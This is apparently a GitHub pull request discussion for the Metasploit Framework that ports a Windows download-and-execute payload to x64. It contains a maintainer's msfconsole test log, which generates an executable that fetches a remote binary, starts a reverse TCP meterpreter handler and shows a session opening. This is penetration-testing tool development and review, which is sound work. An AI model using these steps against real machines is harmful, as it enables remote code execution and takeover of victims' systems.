Conversation

xHector1337
Contributor

I have tried my best to port it from x86 to x64. It has some little problems that I cannot see clearly.

@xHector1337 xHector1337 marked this pull request as draft July 15, 2025 13:53
@xHector1337
Contributor Author

For some reason, when running it with C, it crashes during the URLDownloadToFileA function call.

@xHector1337
Contributor Author

The problem likely lies in URLDownloadToFileA; as is visible in the photo, URLDownloadToFileA calls URLDownloadToFileW, and this somehow makes the executable crash.

[image attachment]

add CachedSize & fix the fifth arg problem & run rubocop
@xHector1337 xHector1337 marked this pull request as ready for review July 17, 2025 08:40
@dledda-r7 dledda-r7 self-assigned this Jul 17, 2025
@adfoster-r7
Contributor

#20386 (comment)

@xHector1337 Were you able to resolve this issue? 👀

@xHector1337
Contributor Author

#20386 (comment)

@xHector1337 Were you able to resolve this issue? 👀

Thanks, I was.

Contributor

@dledda-r7 dledda-r7 left a comment

Code looks clean and correct. I'll give it a shot this week, and if everything works I think we are good to go.

@xHector1337, can you please fix the linting issue?
rubocop -a modules/payloads/singles/windows/x64/download_exec.rb
Thanks!

@xHector1337
Contributor Author

Code looks clean and correct. I'll give it a shot this week, and if everything works I think we are good to go.

@xHector1337, can you please fix the linting issue? rubocop -a modules/payloads/singles/windows/x64/download_exec.rb Thanks!

Thank you, I'll be fixing it immediately.

@dledda-r7
Contributor

msf6 payload(windows/meterpreter/reverse_tcp) > use windows/x64/download_exec
msf6 payload(windows/x64/download_exec) > show options

Module options (payload/windows/x64/download_exec):

   Name      Current Setting          Required  Description
   ----      ---------------          --------  -----------
   DISPLAY   HIDE                     yes       The Display type. (Accepted: HIDE, SHOW)
   EXITFUNC  process                  yes       Exit technique (Accepted: '', seh, thread, process, none)
   FILEPATH  fox.exe                  yes       The path to save the downloaded file.
   URL       http://localhost/hi.exe  yes       The url to download the file from.


View the full module info with the info, or info -d command.

msf6 payload(windows/x64/download_exec) > set filepath m.exe
filepath => m.exe
msf6 payload(windows/x64/download_exec) > set url http://192.168.136.136:8000/metsrv.x64.exe
url => http://192.168.136.136:8000/metsrv.x64.exe
msf6 payload(windows/x64/download_exec) > generate -f exe -o ~/Public/download_exec.exe
[*] Writing 6656 bytes to ~/Public/download_exec.exe...
msf6 payload(windows/x64/download_exec) > use payload/windows/x64/meterpreter_reverse_tcp 
msf6 payload(windows/x64/meterpreter_reverse_tcp) > set lhost eth0
lhost => 192.168.136.136
msf6 payload(windows/x64/meterpreter_reverse_tcp) > to_handler
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
[*] Payload Handler Started as Job 1
msf6 payload(windows/x64/meterpreter_reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.136.136:4445 

msf6 payload(windows/x64/meterpreter_reverse_tcp) > generate -f exe -o ~/Public/metsrv.x64.exe
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
[*] Writing 569856 bytes to ~/Public/metsrv.x64.exe...
msf6 payload(windows/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 2 opened (192.168.136.136:4445 -> 192.168.136.138:55702) at 2025-08-12 05:47:25 -0400

msf6 payload(windows/x64/meterpreter_reverse_tcp) > 

@dledda-r7 dledda-r7 merged commit eb003f7 into rapid7:master Aug 13, 2025
47 checks passed
@dledda-r7
Contributor

dledda-r7 commented Aug 13, 2025

Release Notes

This adds a new payload; the payload/windows/x64/download_execute can be used to download and execute a binary over HTTP, with a reduced code size.

@dledda-r7 dledda-r7 added the rn-payload-enhancement release notes for enhanced payloads label Aug 13, 2025
@xHector1337 xHector1337 deleted the payload/windows/x64/download_exec branch August 13, 2025 11:39